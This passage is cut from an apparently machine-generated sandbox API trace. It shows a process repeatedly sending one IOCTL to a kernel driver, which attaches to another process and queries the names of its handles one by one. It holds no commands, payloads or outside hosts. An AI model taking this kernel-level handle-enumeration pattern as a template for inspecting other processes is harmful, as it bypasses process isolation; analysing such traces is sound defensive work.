lpOverlapped=0x0) returned 1 [0144.106] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0144.107] PsAcquireProcessExitSynchronization () returned 0x0 [0144.107] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0144.107] ObReferenceObjectByHandle (in: Handle=0x5a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003993b30, HandleInformation=0x0) returned 0x0 [0144.107] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0144.107] PsReleaseProcessExitSynchronization () returned 0x2 [0144.107] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0144.107] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80026a57c4, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80026a57c4, ReturnLength=0xfffff88005163508) returned 0x0 [0144.107] ObfDereferenceObject (Object=0xfffffa8003993b30) returned 0x1 [0144.107] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0144.107] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0144.107] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0144.107] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xe6, lpOverlapped=0x0) returned 1 [0144.107] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0144.107] PsAcquireProcessExitSynchronization () returned 0x0 [0144.107] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0144.107] ObReferenceObjectByHandle (in: Handle=0x5a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8001fa4160, HandleInformation=0x0) returned 0x0 [0144.107] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0144.107] PsReleaseProcessExitSynchronization () returned 0x2 [0144.107] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0144.108] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fa4044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fa4044, ReturnLength=0xfffff88005163508) returned 0x0 [0144.108] ObfDereferenceObject (Object=0xfffffa8001fa4160) returned 0x1 [0144.108] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0144.108] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0144.108] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0144.108] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0144.108] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0144.108] PsAcquireProcessExitSynchronization () returned 0x0 [0144.108] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0144.108] ObReferenceObjectByHandle (in: Handle=0x5ac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0017bd4c0, HandleInformation=0x0) returned 0x0 [0144.108] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0144.108] PsReleaseProcessExitSynchronization () returned 0x2 [0144.108] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0144.108] ObQueryNameString (in: Object=0xfffff8a0017bd4c0, ObjectNameInfo=0xfffffa8002f86044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f86044, ReturnLength=0xfffff88005163550) returned 0x0 [0144.108] ObfDereferenceObject (Object=0xfffff8a0017bd4c0) returned 0x1 [0144.108] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0144.108] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0144.109] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0144.109] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x4c, lpOverlapped=0x0) returned 1 [0144.109] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0144.109] PsAcquireProcessExitSynchronization () returned 0x0 [0144.109] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0144.109] ObReferenceObjectByHandle (in: Handle=0x5d8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000c69080, HandleInformation=0x0) returned 0x0 [0144.109] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0144.109] PsReleaseProcessExitSynchronization () returned 0x2 [0144.109] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0144.109] ObQueryNameString (in: Object=0xfffff8a000c69080, ObjectNameInfo=0xfffffa8002456044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002456044, ReturnLength=0xfffff88005163550) returned 0x0 [0144.109] ObfDereferenceObject (Object=0xfffff8a000c69080) returned 0x3 [0144.109] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0144.109] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0144.109] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0144.109] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x84, lpOverlapped=0x0) returned 1 [0144.109] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0144.109] PsAcquireProcessExitSynchronization () returned 0x0 [0144.109] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0144.109] ObReferenceObjectByHandle (in: Handle=0x5ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80037d9630, HandleInformation=0x0) returned 0x0 [0144.110] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0144.110] PsReleaseProcessExitSynchronization () returned 0x2 [0144.110] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0144.110] ObQueryNameString (in: Object=0xfffffa80037d9630, ObjectNameInfo=0xfffffa8002fa0044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fa0044, ReturnLength=0xfffff88005163550) returned 0x0 [0144.110] ObfDereferenceObject (Object=0xfffffa80037d9630) returned 0x11 [0144.110] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0144.110] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0144.110] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0144.110] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x88, lpOverlapped=0x0) returned 1 [0144.110] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0144.110] PsAcquireProcessExitSynchronization () returned 0x0 [0144.110] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0144.110] ObReferenceObjectByHandle (in: Handle=0x5fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80037872d0, HandleInformation=0x0) returned 0x0 [0144.110] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0147.526] PsReleaseProcessExitSynchronization () returned 0x2 [0147.526] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0147.526] ObQueryNameString (in: Object=0xfffffa80037872d0, ObjectNameInfo=0xfffffa8002fd7044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fd7044, ReturnLength=0xfffff88005163550) returned 0x0 [0147.528] ObfDereferenceObject (Object=0xfffffa80037872d0) returned 0x11 [0147.528] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0147.528] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0147.529] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0147.529] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x88, lpOverlapped=0x0) returned 1 [0147.529] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0147.529] PsAcquireProcessExitSynchronization () returned 0x0 [0147.529] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0147.529] ObReferenceObjectByHandle (in: Handle=0x654, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003926700, HandleInformation=0x0) returned 0x0 [0147.530] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0147.530] PsReleaseProcessExitSynchronization () returned 0x2 [0147.530] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0147.530] ObQueryNameString (in: Object=0xfffffa8003926700, ObjectNameInfo=0xfffffa8002fd0584, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fd0584, ReturnLength=0xfffff88005163550) returned 0x0 [0147.531] ObfDereferenceObject (Object=0xfffffa8003926700) returned 0x11 [0147.531] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0147.531] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0147.531] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0147.531] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0147.531] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0147.531] PsAcquireProcessExitSynchronization () returned 0x0 [0147.531] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0147.531] ObReferenceObjectByHandle (in: Handle=0x664, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80039be920, HandleInformation=0x0) returned 0x0 [0147.531] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0147.531] PsReleaseProcessExitSynchronization () returned 0x2 [0147.532] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0147.532] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fd2044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fd2044, ReturnLength=0xfffff88005163508) returned 0x0 [0147.532] ObfDereferenceObject (Object=0xfffffa80039be920) returned 0x1 [0147.532] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0147.532] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0147.532] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0147.532] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x112, lpOverlapped=0x0) returned 1 [0147.532] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0147.532] PsAcquireProcessExitSynchronization () returned 0x0 [0147.532] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0147.532] ObReferenceObjectByHandle (in: Handle=0x69c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003925a30, HandleInformation=0x0) returned 0x0 [0147.532] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0147.532] PsReleaseProcessExitSynchronization () returned 0x2 [0147.532] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0147.532] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fd3044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fd3044, ReturnLength=0xfffff88005163508) returned 0x0 [0147.532] ObfDereferenceObject (Object=0xfffffa8003925a30) returned 0x1 [0147.533] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0147.533] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0147.533] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0147.533] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0147.533] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0147.533] PsAcquireProcessExitSynchronization () returned 0x0 [0147.533] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0147.533] ObReferenceObjectByHandle (in: Handle=0x6ac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0013f0c50, HandleInformation=0x0) returned 0x0 [0147.533] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0147.533] PsReleaseProcessExitSynchronization () returned 0x2 [0147.533] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0147.533] ObQueryNameString (in: Object=0xfffff8a0013f0c50, ObjectNameInfo=0xfffffa8002fd4044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fd4044, ReturnLength=0xfffff88005163550) returned 0x0 [0147.533] ObfDereferenceObject (Object=0xfffff8a0013f0c50) returned 0x2 [0147.533] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0147.533] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0147.533] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0147.533] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x82, lpOverlapped=0x0) returned 1 [0147.534] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0147.534] PsAcquireProcessExitSynchronization () returned 0x0 [0147.534] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0147.534] ObReferenceObjectByHandle (in: Handle=0x6c4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800a871dd0, HandleInformation=0x0) returned 0x0 [0147.534] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0147.534] PsReleaseProcessExitSynchronization () returned 0x2 [0147.534] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0147.534] ObQueryNameString (in: Object=0xfffffa800a871dd0, ObjectNameInfo=0xfffffa8002fd5044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fd5044, ReturnLength=0xfffff88005163550) returned 0x0 [0147.534] ObfDereferenceObject (Object=0xfffffa800a871dd0) returned 0x1 [0147.534] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0147.534] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0147.534] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0147.534] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x82, lpOverlapped=0x0) returned 1 [0147.534] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0147.534] PsAcquireProcessExitSynchronization () returned 0x0 [0147.534] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0147.534] ObReferenceObjectByHandle (in: Handle=0x6c8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003a7e650, HandleInformation=0x0) returned 0x0 [0147.534] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0147.534] PsReleaseProcessExitSynchronization () returned 0x2 [0147.534] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0147.534] ObQueryNameString (in: Object=0xfffffa8003a7e650, ObjectNameInfo=0xfffffa8002fd9044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fd9044, ReturnLength=0xfffff88005163550) returned 0x0 [0147.535] ObfDereferenceObject (Object=0xfffffa8003a7e650) returned 0x1 [0147.535] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0147.535] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0147.535] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0147.535] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0147.535] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0147.535] PsAcquireProcessExitSynchronization () returned 0x0 [0147.535] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0147.535] ObReferenceObjectByHandle (in: Handle=0x6d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0013b6060, HandleInformation=0x0) returned 0x0 [0147.535] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0147.535] PsReleaseProcessExitSynchronization () returned 0x2 [0147.535] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0147.535] ObQueryNameString (in: Object=0xfffff8a0013b6060, ObjectNameInfo=0xfffffa8002fda044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fda044, ReturnLength=0xfffff88005163550) returned 0x0 [0147.535] ObfDereferenceObject (Object=0xfffff8a0013b6060) returned 0x1 [0147.536] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0147.536] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0147.536] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0147.536] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0xe4, lpOverlapped=0x0) returned 1 [0147.536] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0147.536] PsAcquireProcessExitSynchronization () returned 0x0 [0147.536] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0147.536] ObReferenceObjectByHandle (in: Handle=0x6e8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa8003a49370, HandleInformation=0x0) returned 0x0 [0147.536] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0147.536] PsReleaseProcessExitSynchronization () returned 0x2 [0147.536] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0147.536] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8002fdb044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa8002fdb044, ReturnLength=0xfffff88005163508) returned 0x0 [0147.536] ObfDereferenceObject (Object=0xfffffa8003a49370) returned 0x1 [0147.536] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0147.536] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0147.537] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0147.537] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0147.537] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0147.537] PsAcquireProcessExitSynchronization () returned 0x0 [0147.537] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0147.537] ObReferenceObjectByHandle (in: Handle=0x70c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0010e1780, HandleInformation=0x0) returned 0x0 [0147.537] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0147.537] PsReleaseProcessExitSynchronization () returned 0x2 [0147.537] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0147.537] ObQueryNameString (in: Object=0xfffff8a0010e1780, ObjectNameInfo=0xfffffa8002fdc044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002fdc044, ReturnLength=0xfffff88005163550) returned 0x0 [0147.537] ObfDereferenceObject (Object=0xfffff8a0010e1780) returned 0x1 [0147.537] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0147.537] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d0b20 | out: hHeap=0x290000) returned 1 [0147.537] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d0b20 [0147.537] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0147.537] PsLookupProcessByProcessId (in: ProcessId=0x454, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0147.537] PsAcquireProcessExitSynchronization () returned 0x0 [0147.537] KeStackAttachProcess (in: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80036d0060, ApcState=0xfffff880051635d0) [0147.538] ObReferenceObjectByHandle (in: Handle=0x718, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000f89ea0, HandleInformation=0x0) returned 0x0 [0147.538] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0147.538] PsReleaseProcessExitSynchronization () returned 0x2 [0147.538] ObfDereferenceObject (Object=0xfffffa80036d0060) returned 0x18a [0147.538] 